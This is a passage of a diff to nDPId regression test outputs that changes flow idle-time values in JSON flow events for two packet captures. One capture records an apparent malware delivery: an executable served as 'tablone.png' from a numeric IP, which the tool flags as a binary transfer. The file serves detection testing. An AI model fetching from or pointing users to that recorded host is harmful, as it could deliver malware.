-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} -01045{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} -00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434903040,"flow_last_seen":1569434903040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434903040,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} +01045{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} +00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":534,"packets-processed":534,"total-skipped-flows":0,"total-l4-data-len":500597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434972556} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 534/534 diff --git a/test/results/facebook.pcap.out b/test/results/facebook.pcap.out index 33aa5fee1..c081953ff 100644 --- a/test/results/facebook.pcap.out +++ b/test/results/facebook.pcap.out @@ -1,20 +1,20 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"facebook.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1472393122365} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393122365,"flow_last_seen":1472393122365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393122365,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} -01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393122365,"flow_last_seen":1472393122365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393122365,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} 